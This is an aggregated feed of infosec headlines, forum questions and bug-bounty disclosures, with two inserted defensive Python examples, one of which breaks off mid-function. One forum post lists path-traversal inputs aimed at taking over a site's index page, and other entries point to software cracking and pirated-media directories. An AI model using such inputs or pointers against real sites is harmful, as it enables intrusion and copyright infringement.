    Can someone let me know how I can convert a Mac image (APFS) into E01? submitted by /u/Pepperknowsitall [link] [comments]
    Cellebrite Thumbnail Recovery
    Hello everyone, I have two questions regarding a Cellebrite extraction on an iPhone XR on the topic of thumbnails. What does the “access time” mean? Is this the time that the client accessed the photo throughout the day? What is a “creation time”? submitted by /u/ForsakenRKT [link] [comments]

    Follina – a Microsoft Office code execution vulnerability
    Article URL: https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e?gi=ab30e3e1bdaf Comments URL: https://news.ycombinator.com/item?id=31563980 Points: 1 # Comments: 0
    Follina – a Microsoft Office code execution vulnerability
    Article URL: https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e?gi=13aa99ae48de Comments URL: https://news.ycombinator.com/item?id=31554823 Points: 1 # Comments: 0

    Anyone know a good compliance rules matrix template?
    I am looking to organize all the regulatory compliance rules into one nice document to show here are all the different regulatory rules we need to follow. By implementing a solution for this or this we get this, this and this covered in these different compliance frameworks. I am thinking of how to show we are covering all the items from (ISO 27001, CIS, our 3416, PIPEDA, OSFI etc.). I was thinking if there was a template for a RACI or matrix of some kind that someone can point me to? Or how do others track all of the regulations they need to follow and show they are following them? Any help is great. Thanks. submitted by /u/RecoverAdventurous12 [link] [comments]
    Are there any bootcamps or short-term/accelerated courses for a beginner to infosec that would actually help land a job?
    I've heard mostly negative-leaning mixed things about bootcamps, but right now I'm looking for something that will help me get an entry level infosec job without a 4-year degree (degree will come afterward, just need to be able to eat and sleep somewhere while I get it). I do very well with self-paced learning and I learn very quickly. I know that there are lots of resources for teaching yourself and I plan to utilize them, but I'm more concerned with getting some stamp on my resume to get my foot in the door. ​ e: For clarification - I'm less concerned with how effective the teaching is because I can learn on my own, I'm more concerned with it providing me with workplace-relevant things to learn/teach myself and with its prestige in landing a small-time role somewhere. submitted by /u/No_Manufacturer_4701 [link] [comments]
    Education
    I know of SANS Institute and WGU. They are awesome in that you can earn certs while you earn your degree. I was wondering if there are any other colleges/institutes that offer the same package? Currently located in Ohio. Price is not an issue for me due to the G.I. Bill. I'm thinking of going with WGU for an information tech bachelor's and then going to SANS for their master's. I have looked into Wright State for their computer science degree, just not so sure due to the fact they don't offer certs as you get your degree. submitted by /u/Particular-Fault9078 [link] [comments]
    Tool to find secrets in a text message
    We are looking for a tool to find secrets in a text message. The secrets could be AWS keys, Slack auth tokens, API tokens, etc. The text messages are usually typed by the user, or they might copy-paste some configuration files which can contain secrets. I looked at a few tools like semgrep and gitleaks; they work on source files or GitHub repositories. But I need some tool that accepts a text message and returns the result. Thanks in advance. submitted by /u/kmkanagaraj [link] [comments]

    UPnProxyChain: a Tool to Exploit Devices Vulnerable to UPnProxy
    submitted by /u/Salmiakkilakritsi [link] [comments]
    New Zero-Day Code Execution Vulnerability In MS Office - Follina
    submitted by /u/sciencestudent99 [link] [comments]
    Mass account takeover in Yunmai smartscale API (full disclosure)
    submitted by /u/adrian_rt [link] [comments]
    Offensive Windows IPC Internals 3: ALPC
    submitted by /u/0xdea [link] [comments]

    PicoCTF Review
    Hi! Guys I’m back with a new blog and I’m so excited because with this site you can learn a LOT! Continue reading on Medium »
    How to Crack & Install BurpSuite Professional in Kali Linux
    Steps to crack & Install Burpsuite Pro in Kali-Linux Continue reading on Medium »
    Top 5 Hacking Books, Must Read!!
    A hacking and cybersecurity books guide which tells you about the top 10 hacking books. Continue reading on InfoSec Write-ups »
    How to find & access Admin Panel by digging into JS files…
    Hello All,🙂 Continue reading on Medium »
    How I found my first ever XSS on a website.
    So, I have been into web hacking lately. While into it, I have explored bug bounties but never found a bug in real website. I have tested… Continue reading on Medium »
    Introducing Melos Bug Bounty Program
    We’re happy to see how quickly Melos Studio has grown so far, but with that comes some concerns. We have seen many recent crises and fraud… Continue reading on Medium »
    Web application hacking methodology
    Systematic and goal-oriented penetration testing always starts with the right methodology. The following diagram shows how web application… Continue reading on Medium »
    Account Takeover Via Rxss Post
    Hello there, my name is Aryan from Kurdistan, a bug hunter on HackerOne with 6 months' experience; I am also a student at university. Forgive me… Continue reading on Medium »

    War in Ukraine / May 27–29
    Slowing down the pressure of sanctions Continue reading on Medium »
    Hack Hydra co-owner’s crypto wallet
    A Moscow court can confiscate a record amount for Russia from a drug dealer’s crypto wallet, but he does not give the password. We are… Continue reading on Medium »
    Don’t Rely on Tools — OSINT Challenge 24
    Quiztime (contributor @bayer_julia) shared a new OSINT quiz with us. The objective was simple. We had to figure out where it was taken… Continue reading on Medium »
    Hunting Usernames With Sherlock
    Learn how to use sherlock, a powerful command line OSINT tool used for hunting down usernames across social networks. Continue reading on Medium »

    WEB-DLs and Remuxes of Movies and Series
    http://195.154.231.76/mteam/269573/ submitted by /u/GrowAsguard [link] [comments]

    SecWiki News 2022-05-30 Review
    SecWiki Weekly (Issue 430) by ourren; Automated Discovery Methods for Malicious npm Packages by ourren; Tracing a Black-Market Group Defrauding a Well-Known Portal by ourren; Analysis of the Techniques and Infrastructure of the Phishing Email Scam That Hit Sohu by ourren; RSAC 2022 – Innovation Sandbox Impressions (1) by ourren; PE File Structure Analysis 3 by SecIN Community; Artillery: JAVA plugin-based vulnerability scanner by ourren. For more of the latest articles, visit SecWiki

    The Art of Fuzzing (2017) [pdf]
    Article URL: https://sec-consult.com/fileadmin/user_upload/sec-consult/Dynamisch/Blogartikel/2017_11/the_art_of_fuzzing_slides.pdf Comments URL: https://news.ycombinator.com/item?id=31559280 Points: 2 # Comments: 0

    FreeBuf Morning Report | Android pre-installed apps affected by high-severity vulnerabilities; FluBot mobile malware sweeps Europe
    Microsoft disclosed severe security vulnerabilities in the Android app mobile services framework provided by mce Systems; default pre-installed apps from multiple carriers are affected.
    DevSecOps in practice at internet finance companies | FreeBuf enterprise community livestream recap
    Liu Weijie, a security practitioner at an internet finance company, was the keynote speaker in the fourth internal livestream of the FreeBuf enterprise community, sharing how internet finance companies put DevSecOps into practice.
    The National Information Security Standardization Technical Committee releases "Information Security Technology – Requirements for Privacy Agreements of Internet Platforms and Product Services" (draft for comment)
    The draft specifies the drafting procedure, specific content and publication form of privacy agreements for internet platforms and product services, improves the readability and transparency of privacy agreements, and covers the handling of disputes related to them.
    Alert! KillNet may launch a large-scale attack on Italy on May 30
    The pro-Russian hacker group KillNet issued a threat to the Italian government on May 30, saying it would launch an unprecedented large-scale attack.
    EnemyBot malware adds attacks on critical vulnerabilities in VMware and other products
    Keksec, the group behind EnemyBot, is actively developing the malware.
    Microsoft finds Android pre-installed apps affected by high-severity vulnerabilities
    Microsoft's security research team disclosed severe security vulnerabilities in the Android app mobile services framework provided by mce Systems; default pre-installed apps from multiple carriers are affected.
    $568 million in illegal profits: 37-year-old fraudster sentenced to four years
    Telusma was sentenced to four years in prison for selling and using stolen and compromised credit cards, personal information and financial information on the Infraud carding portal run by a transnational cybercrime organization.
    Reuters: backers of Brexit leak website linked to Russian hackers
    The "Very English Coop d'Etat" website was set up to publish the private emails of Brexit supporters.
    世融能量: quantum cryptography and security are inseparable | Cybersecurity New Force SOLO Launch Season
    How can quantum technology be applied to security? The Cybersecurity New Force conference SOLO Launch Season will tell you!

    Users who are restricted to use the application because of a "Waiting List" are able to get access to the Beta Application by bypassing the waitlist
    Alohi disclosed a bug submitted by darkknight4688: https://hackerone.com/reports/1494308

    Pen #004: Linux Basics (Part 1)
    No content preview
    AWS IAM Exploitation Techniques
    No content preview
    Anatomy Of Spring4Shell CVE-2022–22965
    No content preview

    Active Directory Purple Teaming
    This repository is aimed at sharing the cliff notes for performing Red Teaming of Active Directory System combined with Detection… Continue reading on Medium »

    What are the Implications of an automation tool, using PsExec to execute commands (of any kind) on client machines, from a domain controller?
    I use ConnectwiseAutomate (CWA) to manage my environment. Today I was parsing through Sysmon logs, and found that CWA is using PsExec to execute commands on client machines from my domain controller. The commands I've seen it execute are benign in general, and seem to be "normal/built-in" processes (because they're not any I created). But it makes me uncomfortable that this is happening in general. (I've already created a post asking how to stop CWA from doing this.) It makes me uncomfortable because I go out of my way to practice the principle of least privilege, as I'm generally aware of PTH attacks and similar. E.g., I never log onto member servers or workstations as domain admin. I have separate accounts for the administration of standard member servers (in other words, non-do…
    Home Server
    Hey everyone, I would like to set up a home server on a Raspberry Pi 400 or even an older computer. Do you know any step by step guide for a novice person to start with? An OS GUI is mandatory. Thanks in advance submitted by /u/fmsferreira [link] [comments]

    CRYPTOCURRENCY OSINT
    submitted by /u/saqfi [link] [comments]
    GitHub - Orange-Cyberdefense/arsenal: Arsenal is just a quick inventory and launcher for hacking programs
    submitted by /u/saqfi [link] [comments]
    JPG to Malware
    submitted by /u/saqfi [link] [comments]
    ForceAdmin : Create infinite #UAC prompts forcing a user to run as admin.
    submitted by /u/saqfi [link] [comments]
    grsecurity - Tetragone: A Lesson in Security Fundamentals
    submitted by /u/buherator [link] [comments]

    P3 Bug in Just 2 Minute
    Hey Hello, Security guys & Hacker Thank you for your support. Continue reading on Medium »
    DOMAIN ADMIN Compromise in 3 HOURS
    Hi everyone; I hope you enjoyed my previous blog post on “How I obtained Admin access in 30 minutes” — so today I am bringing you another… Continue reading on Medium »
    Biblioteca Walkthrough:THM
    In the past few days, I am recharging myself by trying my hands at different rooms present in tryhackme TryHackMe. So thought why not just… Continue reading on Medium »
    Hall of Fame Vice Media ? hacking while sleepy…
    Hello guys, actually this is the case in 2021 but only now had time to write. So… have you ever heard of Vice media? one of the largest… Continue reading on Medium »

    SecWiki News 2022-05-29 Review
    No news updates yet today. For more of the latest articles, visit SecWiki

    The (interdisciplinary) style of OSINT
    You already know (I have nagged you enough about it in the past) that one of the pillars of my proposal for a General Theory of Intelligence… Continue reading on Medium »
    SPY NEWS: 2022 — Week 21
    Summary of the espionage-related news stories for the Week 21 (22–29 May) of 2022. Continue reading on Medium »
    Video verification: Sent to Chinese quarantine camp
    Video verification article on footage showing Chinese citizens sent off to quarantine camps #OSINT #verification by @Techjournalisto Continue reading on Medium »

    CYBERSOC Information Technology Library Blog
    submitted by /u/cybersocdm [link] [comments]
    Killing The Bear - Cybercrime repo, Threat Actors, Campaigns, Malware, IOCs
    Killing The Bear Hi everyone! I want to share with you my new gitbook/repo about Threat Actors: Killing The Bear. Very useful for SOC, CTI and Threat Hunting teams. In it you can find: - Threat Actors - Malware - Tools - TTPs - IOCs - Summary (executive) - Wallets - Timeline - Relationships - Etc... Yesterday I published the "Killnet" category, you can find it here: Killnet - Actor Gradually more categories are being added with more intel. I hope it will be useful to you or your team. Thank you! submitted by /u/J-Testa [link] [comments]

    Learning Linux & InfoSec Principles Using OverTheWire’s Bandit — Part 4
    No content preview
    Hacking GraphQL — Part 1
    No content preview
    Bypass the Firewall with SSH Tunnelling
    No content preview
    CyberStarters CTF — Gunship
    No content preview

    Heap BINARY EXPLOITATION w/ Matt E! (Tcache Attack)
    submitted by /u/soupcreamychicken [link] [comments]
    REcon is a computer security conference with a focus on reverse engineering and advanced exploitation techniques. It is held annually in Montreal, Canada.
    https://recon.cx/ submitted by /u/soupcreamychicken [link] [comments]

    FreeBuf Morning Report | Taobao bans sale of IP modification and spoofing software and services; General Motors reportedly hit by hackers
    Taobao published the "Taobao Platform Prohibited Information Management Rules", explicitly banning the sale of IP modification/proxy/spoofing software and services. The rule change takes effect on June 3, 2022.
    Logic-level authorization bypass vulnerabilities
    Some of this content comes from that article; it is only a record of my own learning and of what I learned following Di. Overview of horizontal and vertical authorization bypass. Horizontal: an attacker tries to access the resources of another user who holds the same privileges. Vertical: a low-privilege user tries to access the resources of a high-privilege user. (For example, a user's personal information management page is user.php, while the administrator's page for managing all users' information is manageuser.php; the management page has no permission check, so anyone who enters the management page address can access it.) Cause of the vulnerability: authorization bypass vulnerabilities arise because the backend…

    My Photo Investigation Toolkit
    Search by photo Extracting metadata Photoforensic tools Fact-checking tools https://start.me/p/0PgzqO/photo-osint Bye submitted by /u/saqfi [link] [comments]
    Sans Memory forensic Cheat Sheet
    https://github.com/AndrewRathbun/DFIRMindMaps/tree/main/MemoryForensics/SANSMemoryForensicsCheatSheet Complete Cheatsheet submitted by /u/saqfi [link] [comments]

    A security vulnerability in Git that can lead to arbitrary code execution (2018)
    Article URL: https://devblogs.microsoft.com/devops/announcing-the-may-2018-git-security-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31547175 Points: 1 # Comments: 0

    Vulnerable machines for learning
    Are there any vulnerable systems for learning, specifically API? I’ve seen everything but. But figure there has to be some? submitted by /u/networkalchemy [link] [comments]
    Advice On Hashcat Not Detecting AMD GPU
    Hello, I was running hashcat until I realized that I was using my CPU and not my GPU. I have been spending a good amount of time on the internet looking for why my hashcat is not detecting my GPU but struggling to find an answer. I am dual booting PopOS & Kali so I am not running Kali in a VM. My GPU is a Radeon Pro WX 5100. I tested to see if my GPU is actually being used by entering sudo radeontop and ran glxgears to see if it is being picked up. Below are the results found from running sudo radeontop Graphics pipe 3.33% │ ──────────────────────────────────── Event Engine 0.00% │ Vertex Grouper + Tesselator 0.00% │ Texture Addresser 3.33% │ Shader Export 3.33% │ Sequencer Instruction Cache 0.00% │ Shader Interpolator 3.33% │ Scan Converter 3.33% │ Primitive Assembly 0.00% │ Depth Block 3.33% │…
    creating a pentest network on Virtualbox
    I have a Windows Server VM and a Kali Linux VM on VirtualBox. The Windows Server has an FTP server which I will try to hack into. Should I use an internal network on both VMs, or use NAT on the VMs and set up DHCP on Windows Server and then connect both VMs to that? I want to make sure that both VMs are on a network that is isolated from my home network so I can run Nmap and use Metasploit etc. I had used the internal network but the VMs would not get internet access and I was not sure why? Any help will be much appreciated. submitted by /u/ghostexploitelite [link] [comments]
    Recommended Emulator for Android Application Pentesting ?
    What is your favourite emulator for pentesting Android applications? Which proxy (ZAP, Burp, etc.) would you recommend for intercepting traffic? submitted by /u/aim4r [link] [comments]

    What data can teach us about Russian propaganda
    Looking at state news agencies’ reporting on the war shows how propaganda works in a novel way. Continue reading on Medium »
    FBI Reveals Buffalo Mass Shooter Influenced by “Sandman.” Who the hell is that?
    Who platforms those indoctrinating America’s male youth to commit mass murder? Continue reading on Medium »
    My Email Investigation Toolkit
    Verification tools (SMTP, WHOIS, Headers) Email tracking, logging and geolocation Phishing email, permutation Identification email user… Continue reading on Medium »
    Searching for The White City — OSINT Challenge 23
    @Sector035 shared a new OSINT quiz with us. The objective was simple. We had to figure out where… Continue reading on Medium »
    They’re better than you at Google Maps
    I didn’t know you could use the app like this. Continue reading on Medium »

    Domain Escalation: Unconstrained Delegation
    Introduction Post-Windows 2000, Microsoft introduced an option where users could authenticate to one system via Kerberos and work with another system. This was made possible The post Domain Escalation: Unconstrained Delegation appeared first on Hacking Articles.

    Step by step guide of setting up SSL/TLS for a server and client
    submitted by /u/Hakky54 [link] [comments]
    Building a Threat Intelligence Feed using the Twitter API and a bit of code
    submitted by /u/Robbedoes_ [link] [comments]
    Understanding CVE-2022-22972 (VMWare Workspace One Access Auth Bypass)
    submitted by /u/Mempodipper [link] [comments]
    How to secure Kubernetes Deployment
    submitted by /u/antfigunio [link] [comments]
    Rikkei Finance Hack: Explained
    submitted by /u/viagumowl [link] [comments]

    CVE-2022-28738: Double free in Regexp compilation
    Internet Bug Bounty disclosed a bug submitted by piao: https://hackerone.com/reports/1549636 - Bounty: $4000

    Window Registry Forensics Cheatsheet
    submitted by /u/saqfi [link] [comments]
    Master and phd or my job
    I have got a grant for a master's and PhD degree in cybersecurity in the USA. I already have kind of a good job right now; should I take the grant or stay in my job? ** I can't do both. submitted by /u/1328262 [link] [comments]

    My First Bounty Reward For low hanging fruit
    Hello Guys, I am Sanath Vyas R working as Web Penetration Tester & Trainer in RVR Security Solutions. Continue reading on Medium »
    WardenSwap is partnering up with Valix Consulting to strengthen the security support
    On the 14th of March, WardenSwap has to launch a Bug Bounty Program with a reward of up to $100,000 USD on Immunefi. Continue reading on WARDEN Official »

    SecWiki News 2022-05-28 Review
    No news updates yet today. For more of the latest articles, visit SecWiki

    Empire Breakout VM penetration
    A fairly simple box with no major difficulties; what it tests is still your approach and attention to detail!
    "Cybersecurity Standards Practice Guide – Windows 7 Operating System Security Hardening Guidelines": security audit in security configuration hardening (Part 3)
    Based on the practice guide, this article carries out hands-on hardening of the security audit settings in the Windows 7 operating system security configuration.

    How to download a full folder from a website that uses Workers.dev?
    Guys, I've been trying to download courses from this website https://medvideos.su/cursos-gratuitos As you can see, it opens folders full of links that need to be clicked one by one... I've tried to use link extraction + mass downloader extensions, but it simply does not get the links needed. submitted by /u/jopelira [link] [comments]
    Around 1.4+ TB of data. (Mostly chinese)
    https://od.lezi.me/ Few folders had NSFW too. submitted by /u/sematrades [link] [comments]

    Questions about the field!
    Hello r/computerforensics! I am fresh in the IT field and have an Associates degree in Network Security and Computer Forensics! I am in the position to work towards my Bachelors utilizing my new jobs professional development program and I just have a few questions. I live in a rural area but want to pursue this field. I don’t have the ability (due to certain life choices) to move very far. I would like to know the capability to work remote in this field. I have 4 options for a focus in a degree. While 2 interest me, I’d love to hear from people in the field. The focus areas: 1. General (cloud/mobile security, security monitoring/incident response) 2. Cyber Forensics 3. Information Assurance 4. Cybersecurity Analyst. Final question! Do you find that this field is rewarding? Income doesn’t so much matter, I’m already well above what the average of my state is. I suppose that I just want to know if this field is worth it over a general CIS degree. Thanks for anyone who is willing to answer in any capacity! Have a great weekend! submitted by /u/GullibleSquid [link] [comments]

    Whoa now, hold up — CRTP
    Wait a minute, hold up. Can I do that with PowerShell? Continue reading on Medium »
    HackMyVM — Djinn
    Writeup (Español) Continue reading on Medium »
    Azure Container Instance Distributed Operations
    Azure Container Instances Distributed Operations (acido CLI) for Red Team Operations through Azure Cloud. Continue reading on Medium »

    Opticon USA technical documents and software
    submitted by /u/j4eo [link] [comments]
    large directory of audio files + video files
    https://www.mboxdrive.com/ you can upload your own too: https://mailboxdrive.com/upload/ submitted by /u/SinisterYT06 [link] [comments]

    Serious DoS Vulnerability
    Article URL: https://www.theoreticalstructures.io/2022/05/27/the-unbearable-lightness-of-web-vulnerabilities/ Comments URL: https://news.ycombinator.com/item?id=31533658 Points: 2 # Comments: 0

    War in Ukraine / May 26
    Russia is not ready for negotiations Continue reading on Medium »
    A new Coordinate System — OSINT Challenge 22
    After a very long break from my blogs I’m back with a standard Quiztime. Shared by contributor @kollege. The objective was simple. We had… Continue reading on Medium »
    My Photo Investigation Toolkit
    Search by photo Extracting metadata Photoforensic tools Fact-checking tools Continue reading on Medium »

    Can an IP Address be taken from you?
    No one technically owns their allotted IP addresses, right? Are there different parts of the custody chain that could act against an IP address "owner"? Like DNS, ultimately ICANN is the authority and then a domain registrar serves as a middleman. Two levels of authority that can act against your "ownership" of a domain. submitted by /u/navinpr0 [link] [comments]
    How to take control of the index.php file to modify the page using Traversal and IDOR?
    Hello, I've tried with: http://example.com/index.php?file=view.php http://example.com/index.php?file=index.php http://example.com/index.php?file=../index.php http://example.com/index.php?file=..\index.php Can I have some guidance? Thanks submitted by /u/Traditional_Bird_877 [link] [comments]

    GhostTouch: Targeted Attacks on Touchscreens without Physical Touch (pdf, paper)
    submitted by /u/buybank [link] [comments]
    AWS universal rate-limiter bypass
    submitted by /u/thyphoous [link] [comments]
    How Defenders Can Hunt for Malicious JScript Executions
    submitted by /u/Wietze- [link] [comments]
    npm security update: Attack campaign using stolen OAuth tokens
    submitted by /u/mstromich [link] [comments]

    SecWiki News 2022-05-27 Review
    Ghostrings is a collection of Ghidra scripts for recovering string definitions i by BaCde; IEEE S&P 2022 Cloud Coverage (4) by ourren; MANDIANT Core Competencies Framework for Cyber Threat Intelligence Analysts by Avenger. For more of the latest articles, visit SecWiki

    How to Report Bugs and claim your bounty?
    Steps: Continue reading on SageMaster »
    python hash table Data Structures & Algorithms Python3
    Code : Continue reading on Medium »

    FreeBuf Weekly | VMware acquired by semiconductor giant Broadcom; new Zoom vulnerabilities appear
    Semiconductor giant Broadcom acquires virtualization giant and cloud computing company VMware for $61 billion.
    CHAOS ransomware analysis
    Chaos is new ransomware developed in 2021. It is still under development and is offered on underground hacker forums, where it is advertised as a new version of Ryuk.
    [Security Awareness] Have you been social-engineered today?
    Includes 19 tips for defending against social engineering
    Breaking down the 2021 OWASP Top 10 one by one: A03:2021 – Injection
    The latest OWASP Top 10 ranking for 2021 is out. Starting from A01, we give a detailed interpretation; this series describes in detail the changes and content of each vulnerability, with a focus on the newly added ones. A03:2021 – Injection
    RSAC 2022 is about to be held; who will be the biggest winner of the Innovation Sandbox contest?
    On June 6, 2022, the RSAC 2022 Innovation Sandbox contest will be held. Which company will be the final winner, and which track will see a new round of enthusiasm?
    New dark web marketplace Industrial Spy may have joined the ransomware attack ranks
    Recently, it was observed that the new dark web marketplace Industrial Spy is encrypting victims' devices and attempting to launch its own ransomware scheme.
    Google shut down cache servers at two Russian ISPs
    Two Russian internet service providers (ISPs) received notices from Google that the Global Cache servers on their networks had been disabled.
    OAS platform affected by critical RCE and API access vulnerabilities
    Threat analysis experts disclosed security vulnerabilities in the OAS platform that could lead to device access, denial of service and remote code execution.
    PoC code published: this high-severity VMware auth vulnerability needs patching as soon as possible
    On the 26th, Horizon3 security researchers released a proof-of-concept (PoC) exploit and technical analysis for CVE-2022-22972.
    Windows global proxy
    When scanning from purchased VPSes, you may trigger the VPS provider's security mechanisms (I have run into this with both BandwagonHost and Vultr), such as DDoS protection, which shuts the VPS down. With a global proxy set up, we can do some scanning from our own computer…

    Firewall Evasion Techniques using Nmap
    Introduction Continue reading on InfoSec Write-ups »

    Control character filtering misses leading and trailing whitespace in file and folder names
    Nextcloud disclosed a bug submitted by david_h1: https://hackerone.com/reports/1402249 - Bounty: $100
    Notification implicit PendingIntent in com.nextcloud.client allows to access contacts
    Nextcloud disclosed a bug submitted by qj_test: https://hackerone.com/reports/1161401 - Bounty: $250

    Unfixed GMP Type Confusion in PHP <= 5.6.40
    Authors: Alexey Moskvin, Daniil Sadyrin https://github.com/CFandR-github/PHP-binary-bugs/blob/main/GMP_type_conf_unserialize/GMP_type_conf_advisory.md Requirements: PHP <= 5.6.40 Compiled with: ...
    Looking at CVE-2022-1388 through abuse of HTTP hop-by-hop request headers
    Author: Y4er. Original: https://y4er.com/post/from-hop-by-hop-to-cve-2022-1388/ Preface: The recently disclosed BIG-IP vulnerability CVE-2022-1388 involves a concept I had not looked into before, HTTP hop-by-hop headers, hence this article. Recap of CVE-2021-22986: CVE-2021-22986 was caused by improper authentication between Apache and Jetty...
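    The mechanism the article above refers to, as an added example (not code from the article or from F5): under RFC 7230, a conforming proxy treats every header name a client lists in Connection: as hop-by-hop and removes it before forwarding. The header name X-Backend-Auth, the "protected headers" list and both proxy variants are hypothetical; the point is that a header the next hop relies on can be stripped by the sender, so the next hop must never infer trust from a header's absence.

```python
"""Hop-by-hop header handling at an HTTP intermediary (RFC 7230 section 6.1).

Added example, not code from the article or from F5. X-Backend-Auth and the
protected-header list are hypothetical names for this illustration.
"""

# Header names RFC 7230 always treats as hop-by-hop.
STANDARD_HOP_BY_HOP = {
    "connection", "keep-alive", "proxy-authenticate", "proxy-authorization",
    "te", "trailer", "transfer-encoding", "upgrade",
}


def connection_tokens(headers: dict) -> set:
    """Header names listed in Connection:, lower-cased ('keep-alive, X-Foo' -> {'keep-alive', 'x-foo'})."""
    value = next((v for k, v in headers.items() if k.lower() == "connection"), "")
    return {tok.strip().lower() for tok in value.split(",") if tok.strip()}


def forward_conforming(headers: dict) -> dict:
    """What a standards-conforming proxy forwards to the next hop: the standard
    hop-by-hop set plus every header named in Connection: is dropped."""
    drop = STANDARD_HOP_BY_HOP | connection_tokens(headers)
    return {k: v for k, v in headers.items() if k.lower() not in drop}


def forward_hardened(headers: dict, protected=("x-backend-auth",)) -> dict:
    """Defensive variant: refuse the request when the client tries to mark one of
    the application's own end-to-end headers as hop-by-hop, instead of silently
    stripping it. The protected list is an assumption for this example."""
    clash = connection_tokens(headers) & {p.lower() for p in protected}
    if clash:
        raise ValueError(f"Connection header names protected header(s): {sorted(clash)}")
    return forward_conforming(headers)


def demo() -> dict:
    # Constructed request: the sender lists X-Backend-Auth in Connection:.
    request = {
        "Host": "app.internal",
        "Connection": "keep-alive, X-Backend-Auth",
        "X-Backend-Auth": "not-a-valid-token",
        "Content-Type": "application/json",
    }
    return forward_conforming(request)


if __name__ == "__main__":
    print("forwarded by a conforming proxy:", demo())
    try:
        forward_hardened({"Host": "app.internal", "Connection": "X-Backend-Auth"})
    except ValueError as exc:
        print("hardened proxy rejected:", exc)
```

    The stripping itself is standard behaviour and is not the bug; the defect is a downstream component that treats "header missing" as "already authenticated upstream". Fix that assumption first; the hardened proxy is a belt-and-braces control.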

    USB Device Redux, with Timelines
    If you ask DFIR analysts, "What is best in life?", the answer you should hear is, "...creating timelines!" After all, industry luminaries such as Andrew said, "Time is the most important thing in life, and timelines are one of the most useful tools for investigation and analysis.", and Chris said, "The timeline is the central concept of all investigative work." My previous blog post addressed USB-connected devices, but only from the perspective of Windows Event Logs. In this blog post, I wanted to include data from the Registry, incorporated in a timeline so that the various data sources could be viewed through a common lens, in a single pane of glass.  I started by using wevtutil.exe to export current copies of the five Windows Event Logs to a central location. I then used reg.exe to do…

    Physics related OD
    http://www.w2agz.com/Library/ submitted by /u/inoculatemedia [link] [comments]
    Movies and TV
    submitted by /u/owenthewizard [link] [comments]
    Movies-TV-Anime
    http://23.147.64.113/ submitted by /u/SeniorAlbatross [link] [comments]

    Full read SSRF in flyte-poc-us-east4.uberinternal.com
    Uber disclosed a bug submitted by ian: https://hackerone.com/reports/1540906 - Bounty: $2000
    [Urgent] Critical Vulnerability [RCE] on vulnerable to Remote Code Execution by exploiting MS15-034, CVE-2015-1635
    U.S. Dept Of Defense disclosed a bug submitted by ashutosh7: https://hackerone.com/reports/469730
    Read Other Users Reports Through Cloning
    U.S. General Services Administration disclosed a bug submitted by hollaatm3: https://hackerone.com/reports/1505609

    (Classical Cryptography with Python) Part 1
    Hey everyone, welcome back to my blog. Today I want to demonstrate a cryptographic concept with the Python programming language. Let's kick… Continue reading on Medium »
    CVE-2022–29333 Privilege Escalation Power Director 14 — Exploiting GUI Weakness
    A little while ago I saw a video of a PoC of CVE-2022–0354 where the researcher found a vulnerability in a native application of his… Continue reading on Medium »
    WiFi Hacking | Start hacking WiFi with few simple steps ;)
    This article is divided into 2 parts basic steps required to hack a wireless network Continue reading on Medium »

    Scan email inbox to find phishing
    Hi, I am managing 500 employees' inboxes (Microsoft). Are there any solutions that can help me scan all the inboxes daily to discover if there is any missed phishing email that sits inside someone's inbox? submitted by /u/Calm_Scene [link] [comments]
    DDoS Attacks on OT
    Hi guys, Sorry if this is not a good place for this question but I was wondering if you could recommend me some literature, articles and stuff like that regarding DDOS attacks on OT( Operational Technology)? I have to write a paper about that topic but can't find any information about it. submitted by /u/PuzzleheadedYamk [link] [comments]
    EU Control
    Hey guys, I have a question which has interested me for a few days now. This new possible directive unfortunately affects not only these nasty ones, but the entire civilian population. If the EU "chat control" would come into force, how could / would you protect yourself from it? Thank u in advance! Stay healthy submitted by /u/D3ATHB1RD [link] [comments]
    What should I do?
    Hey! HS Junior here. I am currently trying to decide on what I want to do as a career, and have narrowed it down to either Cybersecurity or Quant Finance. Would an undergrad degree in Data Science be good enough for cyber security employers, or should I do a degree in CS? Specifically, I was thinking of doing DS just in case I decide to pursue quant or risk analysis for a wall street firm instead, in which case a mathematics/DS background would fare better than a CS one. Thanks! submitted by /u/TakeTheWs [link] [comments]
    Improving penetration test reporting templates
    Hi, I'm working on automating reporting and I was wondering if you can recommend some examples of good yet simple penetration test templates which include confidentiality, responsibility, summary, scope of systems etc. (the stuff before and after the vulnerabilities). I'm also looking for new layout and design ideas; I would like to modernize some of the graphs and the tables I use. Will appreciate any tips, videos or sources. So far I've found the TCMS Findings Report and public-pentesting-reports on GitHub. Thanks! submitted by /u/tryingtoworkatm [link] [comments]
    What is a cheap/easy WiFi deauth attack detection?
    Without going too big (eg set up of full blown SIEM, buying enterprise grade wifi security appliance etc), what's an easy way to detect deauth attacks. I have limited syslogs from the WAPs, but can set up a Mac/Linux/Windows with wifi card or a RPi. I only need to monitor for a limited period in the immediate term, so it's cool to set up something sub optimal and temporary if it does the job. I can follow an idiot's guide for something moderately complex, but preference is as simple as possible (eg, preconfigured RPi image or a single application with 2 steps to install and configure). In essence, I'd like something that can detect deauth frames, give me a timestamp and originating MAC, either to logs or email alert. Budget is like 8 hours labour, and 200€. submitted by /u/homelaberator [link] [comments]
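    The detection the post above asks for, as an added example (not from the post or any tool it mentions): parse raw 802.11 management frames, pick out deauthentication and disassociation frames, and alert when one transmitter address sends a threshold number of them inside a sliding window, reporting timestamp, claimed source MAC, BSSID and reason code. The frames and timestamps below are constructed inline; in use you would feed frames from a monitor-mode capture (for example scapy's sniff() on a wlan interface in monitor mode, whose packets carry a radiotap header). The threshold and window values are assumptions to tune for your site.

```python
"""Cheap 802.11 deauthentication-flood detector (added example, not from the post)."""
import struct
from collections import defaultdict, deque

TYPE_MGMT = 0
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def mac_bytes(text: str) -> bytes:
    return bytes.fromhex(text.replace(":", ""))


def strip_radiotap(packet: bytes) -> bytes:
    """Monitor-mode captures carry a radiotap header; its total length is the
    little-endian u16 at offset 2. Only call this when the link type is radiotap."""
    rt_len = struct.unpack_from("<H", packet, 2)[0]
    return packet[rt_len:]


def parse_deauth(frame: bytes):
    """Return details of a deauth/disassoc frame, or None for any other frame."""
    if len(frame) < 26:            # 24-byte MAC header + 2-byte reason code
        return None
    fc0 = frame[0]
    if fc0 & 0x03 != 0:            # protocol version must be 0
        return None
    ftype, subtype = (fc0 >> 2) & 0x03, (fc0 >> 4) & 0x0F
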